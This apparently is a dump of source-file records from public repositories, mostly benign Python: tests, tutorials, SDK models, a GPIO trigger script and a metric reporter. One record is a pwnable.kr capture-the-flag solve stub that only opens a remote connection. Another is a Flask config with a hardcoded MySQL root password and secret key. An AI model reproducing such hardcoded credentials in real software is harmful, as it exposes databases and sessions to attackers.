Rectangle(left=5, right=15, top=5, bottom=15),
])
)
def test_randomly_generated(self):
n = 100
s = 1000
m = 150
rectangles = []
for i in range(0, n):
left = random.randint(0, s - 2)
right = random.randint(left + 1, min(s, left + m))
top = random.randint(0, s - 2)
bottom = random.randint(top + 1, min(s, top + m))
rectangle = Rectangle(left=left, right=right, top=top, bottom=bottom)
rectangles.append(rectangle)
while target := overlapper(rectangles):
self.assertTrue(overlap(rectangles))
rectangles.remove(target)
self.assertFalse(overlap(rectangles))
random.shuffle(rectangles)
while len(rectangles):
self.assertFalse(overlap(rectangles))
rectangles.pop()
if __name__ == '__main__':
unittest.main()
| [
"stefan.kanev@gmail.com"
] | stefan.kanev@gmail.com |
5f23d9830b94d4b6209d4050700114bf38faa25c | de5001910545361f1443ab6743131f1035dc4aee | /Numpy/01_N-dimen.py | 9c80ee73f7866cd9b5d6c2e7cea1bc0210b95a68 | [] | no_license | DucThanh1997/Khoa_luan | 04c2a4a4b408f43eeb9a18f2519186de887a619b | fcaef88f22f393078eb8e1bebf134c4916d3b40e | refs/heads/master | 2022-11-29T23:02:47.528585 | 2019-12-31T14:55:26 | 2019-12-31T14:55:26 | 186,123,267 | 0 | 1 | null | 2022-11-28T15:58:12 | 2019-05-11T11:14:34 | Python | UTF-8 | Python | false | false | 1,355 | py | import numpy as np
x = np.array([[1, 2, 3], [4, 5, 6]], np.int16)
print("mảng x: ", x)
print("\n")
print("in cột 2 của x: ", x[:, 1])
print("\n")
print("in dòng 1 của x: ", x[0, :])
print("\n")
print("\n")
y = np.array([[[1, 2, 3], [4, 5, 6]], [[-1, -2, -3], [-4, -5, -6]]], np.int16)
print("mảng 2 chiều y : ", y)
print("\n")
print("in ra phần tử thứ nhất trong dòng thứ nhất ở mảng thứ nhất của y:", y[0, 0, 0])
print("\n")
print("in ra ở cả 2 mảng dòng 2 côt 3 của y: ", y[:, 1, 2])
print("\n")
print("số mảng, số dòng, số cột của y: ", y.shape)
print("\n")
print("in ra số cột của y:", y.ndim)
print("\n")
print("in ra kiểu dữ liệu của y:", y.dtype)
print("\n")
print("mảng np có thể được coi là 1 ma trận nên chúng ta có thể đảo chiều x từ 2 dòng 3 cột thành 3 dòng 2 cột: ", x.T)
print("\n")
print("\n")
print("In ra các giá trị mặc định")
print("Dương vô cùng:", np.Inf)
print("\n")
print("Not a number:", np.NAN)
print("\n")
print("âm vô cùng:", np.NINF)
print("\n")
print("âm 0: ", np.NZERO)
print("\n")
print("dương 0: ", np.PZERO)
print("\n")
print("số e: ", np.e)
print("\n")
print("euler: ", np.euler_gamma)
print("\n")
print("số pi: ", np.pi)
| [
"noreply@github.com"
] | DucThanh1997.noreply@github.com |
e04ef3b1cbd752b86f154186d48662ed0bc3505e | 4565e949c16af3e11d8b0fcbe737971974162988 | /app1.py | 26256d04febf96fd6d1e16feffc76e32629aa2d6 | [] | no_license | Kappalize/git-github | 69a4165de6e1d23aa445b848e1894fa19860de97 | f1085b10f03eff66c3bcc2eb003cd8dda19a18c0 | refs/heads/master | 2020-04-22T13:11:35.211188 | 2019-03-07T03:30:02 | 2019-03-07T03:30:02 | 170,400,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py |
def main():
namibia()
angola()
def namibia():
bird = 5000
print(f'Namibia has {bird} bird.')
def angola():
bird = 3000
print('Angola has {bird} bird.')
main()
| [
"noreply@github.com"
] | Kappalize.noreply@github.com |
8f146c6797bd36f47f97f9b1f2f25369e0da9fe9 | 976e242dcebfa105b406784c94be70b631f0b9d2 | /pwnable.kr/starcraft/solve.py | 19074356ac460432c79fed64e331ce3c10f1df08 | [] | no_license | whszzzzzz/ctfwriteup | 7ef9f239211e17140e156ad168a788c36c2a339e | 8fab747c2eafa8874c446c3add9c10769af85c99 | refs/heads/master | 2021-06-19T15:10:28.159827 | 2017-07-07T07:54:44 | 2017-07-07T07:54:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | from pwn import *
s = remote('192.168.0.85',1234)
s.interactive()
| [
"mashirogod@gmail.com"
] | mashirogod@gmail.com |
1a6408cf2bf15c07c9977aa6de6ea73d2bf257f7 | 289559fe935ca8f0437854c7cc55b2bcd81f3e09 | /config.py | 0a6e5ff4b04f60d99951d65790fbc38a641aac01 | [] | no_license | aSimonSheng/origin | 4463ffbb29134f081f94749d38d300256b60562c | 0a89a57171f6bd6b248db1afe5db287f791ff4bb | refs/heads/master | 2020-03-19T19:33:36.691073 | 2018-06-19T12:53:07 | 2018-06-19T12:53:07 | 136,862,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | # -*-coding:utf-8-*-
import redis
import logging
class Config(object):
# 普通配置
DEBUG = True
SECRET_KEY = 'akdjhaidiagdgag'
#数据库配置
SQLALCHEMY_DATABASE_URI = 'mysql://root:mysql@192.168.223.141:3306/information'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
#redis配置
REDIS_HOST = '127.0.0.1'
REDIS_POST = 6379
# 配置session信息
SESSION_TYPE = 'redis'
SESSION_USE_SIGNER = True #session签字存储(签字代表秘钥)
SESSION_REDIS = redis.StrictRedis(REDIS_HOST, REDIS_POST)
PERMANENT_SESSION_LIFETIME = 3600*24*2 # 设置session有效期
# 控制日志输出等级
LEVEL = logging.DEBUG
# 开发模式
class DeveloperConfig(Config):
pass
# 生产模式
class ProductConfig(Config):
DEBUG = False
LEVEL = logging.ERROR
pass
#测试模式
class TestingConfig(Config):
pass
config_dict = {
'develop':DeveloperConfig,
'product':ProductConfig,
'testing':TestingConfig
} | [
"aSimonSheng@outlook.com"
] | aSimonSheng@outlook.com |
afb53abd9153e5aa6e56688b5411afd6c282a5ab | 4c617db46fb3eeb80a9acd9549d59307929a74dd | /test.py | 8e446be3ec2c0cb205a4de57a2912a65913bfe63 | [] | no_license | mAzurkovic/PyElements | 79e0c771311b56254083531f1bf6223a4ce8d4b5 | e8f5276bc1059e3a070e94cf97894330ca23625d | refs/heads/master | 2020-12-25T16:25:03.895084 | 2016-08-05T17:51:40 | 2016-08-05T17:51:40 | 40,604,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | import pyelements as elements
print elements.get_by_name("Hydrogen")
| [
"mattias@zurkovic.com"
] | mattias@zurkovic.com |
ee247b71130125baa5f05f0fafa6ddf3753e5211 | 49e8d7b7075a4676c012d9ecf71dc978bd8f3174 | /Competitive/Day14/constructBSTfromPreoreder.py | c120b05b28f01eb4877220cb5cde32ecef9c0b91 | [] | no_license | eban12/compettitive_programing-cs478- | 3e06011ffb86172995dc69124832e0f69c85544e | 0c0f2e77a4ae989bbf249618bc11825561e9bc1c | refs/heads/master | 2021-07-13T05:34:02.988023 | 2020-12-02T12:11:26 | 2020-12-02T12:11:26 | 225,411,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def bstFromPreorder(preorder: List[int]) -> TreeNode:
if len(preorder) == 0:
return None
left = []
right = []
r = preorder[0]
for i in preorder[1:]:
if i < r:
left.append(i)
else:
right.append(i)
root = TreeNode(r)
if len(left) > 0:
root.left = self.bstFromPreorder(left)
if len(right) > 0:
root.right = self.bstFromPreorder(right)
return root | [
"noreply@github.com"
] | eban12.noreply@github.com |
81f2637a8ed5c8510fcc5945d5235d911e45462f | 7c68212791621363da7f007b1ef449597937d20c | /day_1/operator_shorthand.py | 7070ebe9f8fe49ba7490762189795e3db53c65f3 | [
"MIT"
] | permissive | anishLearnsToCode/python-workshop-8 | c1ad5c2f06b435b612acc28544180b47c86fb24f | 0f64bfa7cf175283181b6e7f51a5e3b80d4b6b60 | refs/heads/main | 2023-02-07T11:55:48.372944 | 2021-01-03T08:41:33 | 2021-01-03T08:41:33 | 325,730,441 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | # variable [operator]= var_2 / value
# i = i + 1 --> i += 1
# result = result + i --> result += i
# var /= 5 --> var = var / 5
# i *= 3--> i = i * 3
# prod %= 10 --> prod = prod % 10
| [
"anish_@outlook.com"
] | anish_@outlook.com |
33fbb86f0c1d4774178156a30d673684559ba579 | ced56909016fb7c2175c3911fc8481bd5fdf0800 | /pytext/metric_reporters/disjoint_multitask_metric_reporter.py | 83d419bc152137138df46faa0ff3715e14e05512 | [
"BSD-3-Clause"
] | permissive | coderbyr/pytext | e258a3aae625e6a2fd386b60f25ac44a7b4149fe | 72c1ad835a30bef425494b02a6210f2e3232b1a4 | refs/heads/master | 2022-11-20T09:11:44.991716 | 2020-07-20T22:05:42 | 2020-07-20T22:07:15 | 281,286,078 | 1 | 0 | NOASSERTION | 2020-07-21T03:32:42 | 2020-07-21T03:32:41 | null | UTF-8 | Python | false | false | 4,013 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Dict, Optional
from pytext.common.constants import BatchContext
from .metric_reporter import MetricReporter
AVRG_LOSS = "_avrg_loss"
class DisjointMultitaskMetricReporter(MetricReporter):
lower_is_better = False
class Config(MetricReporter.Config):
use_subtask_select_metric: bool = False
def __init__(
self,
reporters: Dict[str, MetricReporter],
loss_weights: Dict[str, float],
target_task_name: Optional[str],
use_subtask_select_metric: bool,
) -> None:
"""Short summary.
Args:
reporters (Dict[str, MetricReporter]):
Dictionary of sub-task metric-reporters.
target_task_name (Optional[str]):
Dev metric for this task will be used to select best epoch.
Returns:
None: Description of returned object.
"""
super().__init__(None)
self.reporters = reporters
self.target_task_name = target_task_name or ""
self.target_reporter = self.reporters.get(self.target_task_name, None)
self.loss_weights = loss_weights
self.use_subtask_select_metric = use_subtask_select_metric
def _reset(self):
self.total_loss = 0
self.num_batches = 0
def batch_context(self, raw_batch, batch):
context = {BatchContext.TASK_NAME: batch[BatchContext.TASK_NAME]}
reporter = self.reporters[context[BatchContext.TASK_NAME]]
context.update(reporter.batch_context(raw_batch, batch))
return context
def add_batch_stats(
self, n_batches, preds, targets, scores, loss, m_input, **context
):
self.total_loss += loss
self.num_batches += 1
# losses are weighted in DisjointMultitaskModel. Here we undo the
# weighting for proper reporting.
if self.loss_weights[context[BatchContext.TASK_NAME]] != 0:
loss /= self.loss_weights[context[BatchContext.TASK_NAME]]
reporter = self.reporters[context[BatchContext.TASK_NAME]]
reporter.add_batch_stats(
n_batches, preds, targets, scores, loss, m_input, **context
)
def add_channel(self, channel):
for reporter in self.reporters.values():
reporter.add_channel(channel)
def report_metric(
self,
model,
stage,
epoch,
reset=True,
print_to_channels=True,
optimizer=None,
privacy_engine=None,
):
metrics_dict = {AVRG_LOSS: self.total_loss / self.num_batches}
for name, reporter in self.reporters.items():
print(f"Reporting on task: {name}")
metrics_dict[name] = reporter.report_metric(
model, stage, epoch, reset, print_to_channels, optimizer=optimizer
)
if reset:
self._reset()
if self.target_reporter:
return metrics_dict[self.target_task_name]
for name, reporter in self.reporters.items():
metrics_dict[name] = reporter.get_model_select_metric(metrics_dict[name])
return metrics_dict
def get_model_select_metric(self, metrics):
if self.target_reporter:
metric = self.target_reporter.get_model_select_metric(metrics)
if self.target_reporter.lower_is_better:
metric = -metric
elif self.use_subtask_select_metric:
metric = 0.0
for name, reporter in self.reporters.items():
sub_metric = metrics[name]
if reporter.lower_is_better:
sub_metric = -sub_metric
metric += sub_metric
else: # default to training loss
metric = -metrics[AVRG_LOSS]
return metric
def report_realtime_metric(self, stage):
for _, reporter in self.reporters.items():
reporter.report_realtime_metric(stage)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b05b3a6a6396536b1612af4847b1d785dc4f0807 | 764aee352f4f9d6b4c30f01f1d00c4d2d58c4f39 | /venv/bin/chardetect | 18def21d0c4a41fc745b7faedb0b6e10c7ed2b74 | [] | no_license | swsachith/dataAPI-flask | 6d2866dc812cb630ce25ab996071399decedadb1 | fe33f8b75374d5e5ae3606f27a2a1a9751b3ce5d | refs/heads/master | 2021-06-11T23:51:43.744532 | 2021-05-25T15:54:50 | 2021-05-25T15:54:50 | 153,512,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/Users/swithana/git/imls/dataAPI-python/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"swsachith@gmail.com"
] | swsachith@gmail.com | |
14c865664a58431c88b01845092d21e804f2e15a | b999989d482489912af19903e0346ada046d8995 | /python/broadinstitute_cmap/clue_api_client/test_macchiato_queries.py | a842ce02b25af177118e68d7ad9711eb3ca4b503 | [
"BSD-3-Clause"
] | permissive | zhaoli2017/l1ktools | 979c6a238e2c81ea013b8eddc141008a8c95f3c1 | 6e9c89cf3a8e8d14f2b495932ae04a454ea5eb68 | refs/heads/master | 2021-01-19T21:20:16.562481 | 2017-03-27T22:48:26 | 2017-03-27T22:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,156 | py | import unittest
import setup_logger
import logging
import test_clue_api_client
import macchiato_queries as mq
__authors__ = "David L. Lahr"
__email__ = "dlahr@broadinstitute.org"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
cao = None
test_brew_prefix = "test_brew_prefix_for_test_macchiato_queries"
test_status = "test macchiato status for test_macchiato_queries"
class TestMacchiatoQueries(unittest.TestCase):
def setUp(self):
test_clue_api_client.add_entry_if_not_already_present(cao, mq.resource_name,
{"brew_prefix":test_brew_prefix}, {"brew_prefix":test_brew_prefix, "status": test_status})
def test_is_brew_prefix_in_api(self):
r = mq.is_brew_prefix_in_api(cao, test_brew_prefix)
self.assertTrue(r)
r = mq.is_brew_prefix_in_api(cao, "Dave Lahr's fake brew prefix that hopefully will never exist in the API")
self.assertFalse(r)
def test_get_api_id(self):
r = mq.get_api_id(cao, test_brew_prefix)
self.assertIsNotNone(r)
logger.debug("r: {}".format(r))
def test_change_status(self):
cur_id = mq.get_api_id(cao, test_brew_prefix)
expected_new_status = "test status for test_macchiato_queries TestMacchiatoQueries.test_change_status"
r = mq.change_status(cao, cur_id, expected_new_status)
self.assertIsNotNone(r)
logger.debug("r: {}".format(r))
self.assertIn("status", r)
self.assertEqual(expected_new_status, r["status"])
def test_create_brew_prefix_in_api(self):
#happy path
expected_brew_prefix = "brew_prefix for TestMacchiatoQueries.test_create_brew_prefix_in_api"
r = mq.create_brew_prefix_in_api(cao, expected_brew_prefix, status=test_status)
self.assertIsNotNone(r)
logger.debug("r: {}".format(r))
self.assertIn("id", r)
self.assertIsNotNone(r["id"])
#cleanup by deleting created entry
cao.run_delete(mq.resource_name, r["id"])
if __name__ == "__main__":
setup_logger.setup(verbose=True)
cao = test_clue_api_client.build_clue_api_client_from_default_test_config()
unittest.main() | [
"dlahr@broadinstitute.org"
] | dlahr@broadinstitute.org |
a566a7e2e4d20ec72b89062af4c532ed1123f14f | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-hss/huaweicloudsdkhss/v5/model/list_port_statistics_response.py | 13b10f29de59c0c0d34e2530004b515adf013fcb | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 4,349 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListPortStatisticsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'total_num': 'int',
'data_list': 'list[PortStatisticResponseInfo]'
}
attribute_map = {
'total_num': 'total_num',
'data_list': 'data_list'
}
def __init__(self, total_num=None, data_list=None):
"""ListPortStatisticsResponse
The model defined in huaweicloud sdk
:param total_num: 开放端口总数
:type total_num: int
:param data_list: 开放端口统计信息列表
:type data_list: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
"""
super(ListPortStatisticsResponse, self).__init__()
self._total_num = None
self._data_list = None
self.discriminator = None
if total_num is not None:
self.total_num = total_num
if data_list is not None:
self.data_list = data_list
@property
def total_num(self):
"""Gets the total_num of this ListPortStatisticsResponse.
开放端口总数
:return: The total_num of this ListPortStatisticsResponse.
:rtype: int
"""
return self._total_num
@total_num.setter
def total_num(self, total_num):
"""Sets the total_num of this ListPortStatisticsResponse.
开放端口总数
:param total_num: The total_num of this ListPortStatisticsResponse.
:type total_num: int
"""
self._total_num = total_num
@property
def data_list(self):
"""Gets the data_list of this ListPortStatisticsResponse.
开放端口统计信息列表
:return: The data_list of this ListPortStatisticsResponse.
:rtype: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
"""
return self._data_list
@data_list.setter
def data_list(self, data_list):
"""Sets the data_list of this ListPortStatisticsResponse.
开放端口统计信息列表
:param data_list: The data_list of this ListPortStatisticsResponse.
:type data_list: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
"""
self._data_list = data_list
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListPortStatisticsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
3eab1b761be0160d622ff707caaff063326f4b71 | 6c5ce1e621e0bd140d127527bf13be2093f4a016 | /ex021/venv/Scripts/easy_install-3.7-script.py | e7deca8d0b6f3b28588ce8d8072d461ed000115f | [
"MIT"
] | permissive | ArthurAlesi/Python-Exercicios-CursoEmVideo | 124e2ee82c3476a5a49baafed657788591a232c1 | ed0f0086ddbc0092df9d16ec2d8fdbabcb480cdd | refs/heads/master | 2022-12-31T13:21:30.001538 | 2020-09-24T02:09:23 | 2020-09-24T02:09:23 | 268,917,509 | 0 | 0 | null | null | null | null | ISO-8859-2 | Python | false | false | 508 | py | #!C:\Users\User\Documents\github-MeusRepositórios\Python-Exercicios-CursoEmVideo\ex021\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"54421573+ArthurAlesi@users.noreply.github.com"
] | 54421573+ArthurAlesi@users.noreply.github.com |
536f0f4c79b3a562c018f6d57f29211e768b5a38 | 40cb46b3f9ec1dd792578e8f423e3fa02e844ec2 | /tools/ExplicitGameToSlugsTranslator/translator.py | 5bea04c1b6c3a8fd6a946efb560ff77d1885d54f | [] | no_license | tuc-es/guisynth | ac83acfc6c3086a38a06b7c1aa9543e69531d369 | 46e71eb37361aa42b5eb47139ef799a3a116faf6 | refs/heads/master | 2021-11-22T13:59:21.241793 | 2021-08-05T11:17:13 | 2021-08-05T11:17:13 | 185,566,388 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,440 | py | #!/usr/bin/env python3
#
# Translates a game for GUISynth to a specification file for slugs.
#
# Reads from stdin, writes to stdout
import os, sys
# Check preamble
firstLine = sys.stdin.readline()
if firstLine.strip()!="UVWBasedGame":
print("Error: Expected a UVWBasedGame.",file=sys.stderr)
sys.exit(1)
# Declare variables
inputSignals = []
outputSignals = []
states = [] # Format: (name,typeBool--assumptions=False)
rejectingStates = []
initialStates = []
transitions = []
# Read input lines
for line in sys.stdin.readlines():
lineparts = line.strip().split(" ")
if lineparts[0]=="Input":
assert len(lineparts)==2
inputSignals.append(lineparts[1])
elif lineparts[0]=="Output":
assert len(lineparts)==2
outputSignals.append(lineparts[1])
elif lineparts[0]=="State":
assert lineparts[1] in ["Assumptions","Guarantees"]
stateName = lineparts[2]
states.append((stateName,lineparts[1]=="Guarantees"))
for flag in lineparts[3:]:
if flag=="reject":
rejectingStates.append((stateName,lineparts[1]=="Guarantees"))
elif flag=="initial":
initialStates.append((stateName,lineparts[1]=="Guarantees"))
else:
raise Exception("Unknown state flag: "+flag)
elif lineparts[0]=="Transition":
assert lineparts[1] in ["Assumptions","Guarantees"]
typeFlag = lineparts[1]=="Guarantees"
transitions.append((typeFlag,lineparts[2],lineparts[-1],lineparts[3:-1]))
# Turn length for the output player
limit_turnlength = 16
# Input Propositions and Output Propositions
nofInputPropositions = 1
while (1 << nofInputPropositions) <= len(inputSignals):
nofInputPropositions += 1
nofOutputPropositions = 1
while (1 << nofOutputPropositions) <= len(outputSignals):
nofOutputPropositions += 1
inputPropositions = ["inap"+str(a) for a in range(0,nofInputPropositions)]
outputPropositions = ["outap"+str(a) for a in range(0,nofOutputPropositions)]
# Encode signals into propositions
signalEncodingsPre = {}
signalEncodingsPost = {}
# ---> input
for i,a in enumerate(inputSignals):
m = ("& "*(nofInputPropositions-1)).strip()
mP = ("& "*(nofInputPropositions-1)).strip()
for j in range(0,nofInputPropositions):
if ((1 << j) & (i+1))>0:
m = m + " "+inputPropositions[j]
mP = mP + " "+inputPropositions[j]+"'"
else:
m = m + " ! "+inputPropositions[j]
mP = mP + " ! "+inputPropositions[j]+"'"
signalEncodingsPre[a] = m
signalEncodingsPost[a] = mP
# ---> output
for i,a in enumerate(outputSignals):
m = ("& "*(nofOutputPropositions-1)).strip()
mP = ("& "*(nofOutputPropositions-1)).strip()
for j in range(0,nofOutputPropositions):
if ((1 << j) & (i+1))>0:
m = m + " "+outputPropositions[j]
mP = mP + " "+outputPropositions[j]+"'"
else:
m = m + " ! "+outputPropositions[j]
mP = mP + " ! "+outputPropositions[j]+"'"
signalEncodingsPre[a] = m
signalEncodingsPost[a] = mP
assert len(signalEncodingsPre)==len(inputSignals)+len(outputSignals)
# No action
noActionOutputPre = ("& "*(nofOutputPropositions-1))+" ".join(["! "+a for a in outputPropositions])
noActionOutputPost = ("& "*(nofOutputPropositions-1))+" ".join(["! "+a+"'" for a in outputPropositions])
noActionInputPre = ("& "*(nofInputPropositions-1))+" ".join(["! "+a for a in inputPropositions])
noActionInputPost = ("& "*(nofInputPropositions-1))+" ".join(["! "+a+"'" for a in inputPropositions])
# Define action encoding function
def encodeAction(actionList):
result = []
for a in actionList:
if a in signalEncodingsPre:
result.append(signalEncodingsPre[a])
else:
result.append(a)
return result
# Sanity check.....
assert outputSignals[0]=="done"
# Generate Preamble
print("[INPUT]")
for i in inputPropositions:
print(i)
print("\n[OUTPUT]")
for o in outputPropositions:
print(o)
for (statename,typ) in states:
if typ:
combined = "g_"+statename
else:
combined = "a_"+statename
print(combined)
# Special output action: mode.
print("turn")
print("turnlength:0..."+str(limit_turnlength-1))
# Initial state
print("\n[SYS_INIT]")
for (statename,typ) in states:
if typ:
combined = "g_"+statename
else:
combined = "a_"+statename
if (statename,typ) in initialStates:
print(combined)
else:
print("! "+combined)
print("! turn")
# Input Actions -- Exactly one
print("\n[ENV_INIT]\n")
# Initially, exactly one valid input.
print("| "*(len(inputSignals)-1)+" ".join([signalEncodingsPre[a] for a in inputSignals]))
print("\n[ENV_TRANS]\n")
# Either there is an input or not
print("| "*len(inputSignals)+" ".join([signalEncodingsPost[a] for a in inputSignals])+" "+noActionInputPost)
# No turn? No input!
for a in inputSignals:
print("| turn ! "+signalEncodingsPost[a])
# If there is a turn, then valid input
print("| ! turn "+"| "*(len(inputSignals)-1)+" ".join([signalEncodingsPost[a] for a in inputSignals]))
# Output Actions -- Initially none
print("\n[SYS_INIT]")
print(noActionOutputPre)
# Output Actions - afterwards, one if it is not the environment player's turn
print("\n[SYS_TRANS]")
outputVarsPrimed = [a+"'" for a in outputSignals]
print("| "*len(outputSignals)+" ".join([signalEncodingsPost[a] for a in outputSignals])+" turn")
for a in outputSignals:
print("| ! turn ! "+signalEncodingsPost[a])
# SYS_TRANS -- Turn semantics -- The variable tells if it is the environment player's turn NEXT --
print("[SYS_TRANS]")
print("turn -> ! turn'")
print("! turn -> (turnlength'=turnlength+1)")
# encode "! turn -> (done' <-> turn')"
print("| turn ! ^ turn' "+signalEncodingsPost["done"])
# Updating the state information
print("[SYS_TRANS]")
for (name,stateType) in states:
if stateType:
prefix = "g_"
else:
prefix = "a_"
incoming = []
for (typeflag,fromState,toState,label) in transitions:
# print((typeflag,fromState,toState,label))
if typeflag==stateType and toState==name:
def retrue(k):
if k=="TRUE":
return "1"
elif k=="FALSE":
return "0"
return k
incoming.append((fromState,[retrue(a) for a in label]))
# print(incoming)
print("! ^ "+prefix+name+"' "+"| "*(len(incoming))+" ".join(["& "+prefix+fromstate+" "+" ".join(encodeAction(label)) for (fromstate,label) in incoming]+["0"]))
# Liveness assumptions & Guarantees
for (name,stateType) in rejectingStates:
if stateType:
prefix = "g_"
print("[SYS_LIVENESS]")
else:
prefix = "a_"
print("[ENV_LIVENESS]")
incoming = []
for (typeflag,fromState,toState,label) in transitions:
# print((typeflag,fromState,toState,label))
if typeflag==stateType and toState==name and fromState==name:
def retrue(k):
if k=="TRUE":
return "1"
elif k=="FALSE":
return "0"
return k
incoming.append([retrue(a) for a in label])
print("| | ! "+prefix+name+" ! "+prefix+name+"' ! "+"| "*(len(incoming))+" ".join([" ".join(encodeAction(label)) for label in incoming]+["0"]))
# Special waiting semantics: The system must never be in a state where it is waiting, but the environment is not.
# print(rejectingStates)
for (postFlag,section) in [(True,"[SYS_TRANS]"),(False,"[SYS_INIT]")]:
print(section)
if postFlag:
postfix="'"
else:
postfix=""
rejectingAssumptionStates = ["a_"+a+postfix for (a,b) in rejectingStates if not b]+["0"]
if postFlag:
rejectingAssumptionStates.append("! turn")
for (nameA,flagA) in rejectingStates:
if flagA==True:
print("| ! g_"+nameA+postfix+" "+"| "*(len(rejectingAssumptionStates)-1)+" ".join(rejectingAssumptionStates))
# Special Error semantics
systemStates = [a for (a,b) in states if b]
environmentStates = [a for (a,b) in states if not b]
print("[SYS_TRANS]")
print("| | ! turn ! g_"+systemStates[0]+"' a_"+environmentStates[0]+"'")
print("[SYS_INIT]")
print("| ! g_"+systemStates[0]+" a_"+environmentStates[0])
| [
"rehlers@uni-bremen.de"
] | rehlers@uni-bremen.de |
caec9dc5aef8d0e7b90c14f7279598cbf41b4316 | c5a413defa9410ab9c286733eb5926faecd57967 | /gpio_sync.py | b62d7e326876dbab393e179aadcba042811dcfa2 | [] | no_license | StevenWang30/tx2_sync | 4f01519b193e504e22e48b8ee535f8e44d7bc722 | 9dbb98208976643dbb85a15c477c380b14139833 | refs/heads/main | 2023-01-04T16:04:35.653847 | 2020-11-01T09:34:39 | 2020-11-01T09:34:39 | 309,049,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | import Jetson.GPIO as GPIO
import time as time #引用需要用的库
lidar_trigger = 11
camera_trigger = 13
GPIO.setmode(GPIO.BOARD)
# GPIO.setup(lidar_trigger, GPIO.OUT)
# GPIO.setup(camera_trigger, GPIO.OUT)
#
# trig = 0
#
# try:
# while (True):
# if trig % 10 == 0:
# GPIO.output(lidar_trigger, GPIO.HIGH)
# GPIO.output(camera_trigger, GPIO.HIGH)
# time.sleep(0.1)
#
# GPIO.output(lidar_trigger, GPIO.LOW)
# GPIO.output(camera_trigger, GPIO.LOW)
#
# trig += 1
# except KeyboardInterrupt:
# GPIO.cleanup()
#
GPIO.setup(lidar_trigger, GPIO.OUT, initial=GPIO.HIGH)
l_t = GPIO.PWM(lidar_trigger, 50) # 50Hz
l_t.start(25) # 25% duty cycle
GPIO.setup(camera_trigger, GPIO.OUT, initial=GPIO.HIGH)
c_t = GPIO.PWM(camera_trigger, 50) # 50Hz
c_t.start(25) # 25% duty cycle
print("PWM running. Press CTRL+C to exit.")
try:
while True:
# p.ChangeDutyCycle(dc) # where 0.0 <= dc <= 100.0
time.sleep(1)
finally:
l_t.stop()
c_t.stop()
GPIO.cleanup()
| [
"swangcy@connect.ust.hk"
] | swangcy@connect.ust.hk |
